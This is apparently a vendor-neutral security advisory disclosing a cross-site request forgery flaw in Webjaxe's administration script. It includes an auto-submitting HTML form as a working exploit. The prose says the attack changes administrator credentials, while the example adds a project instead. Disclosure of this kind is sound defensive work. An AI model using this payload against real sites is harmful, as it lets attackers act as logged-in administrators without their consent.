High-Tech Bridge SA Security Research Lab has discovered vulnerability in Webjaxe which could be exploited to perform cross-site request forgery attacks.
- Cross-site request forgery (CSRF) in Webjaxe
The vulnerability exists due to insufficient validation of the request origin in php/partie_administrateur/administration.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link and modify administrator`s credentials.
Exploitation example:
<form action=“http://[host]/php/partie_administrateur/administration.php” method=“post” name=“main” id=“main”>
<input type=“hidden” name=“action” value=“ajouter_projet”>
<input type=“hidden” name=“titre_projet” value=“123123”>
<input type=“hidden” name=“ajouter” value=“Add”>
<input type=“hidden” name=“submit” value=“OK”>
<input type=“submit” id=“btn”>
</form>
<script>
document.getElementById(‘btn’).click();
</script>